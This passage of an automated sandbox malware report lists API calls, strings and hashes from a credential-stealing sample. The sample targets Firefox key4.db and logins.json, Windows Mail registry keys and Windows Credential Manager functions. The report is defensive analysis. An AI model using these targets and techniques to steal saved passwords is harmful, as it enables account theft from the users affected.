                                                                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                      • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75C50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75C50A60), ref: 00406D4D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                                                                    • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                                    • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                                    • API String ID: 665470638-2687544566
                                                                                                                                                                                                                                    • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                                                                    • API String ID: 551151806-1288872324
                                                                                                                                                                                                                                    • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                                    APIs
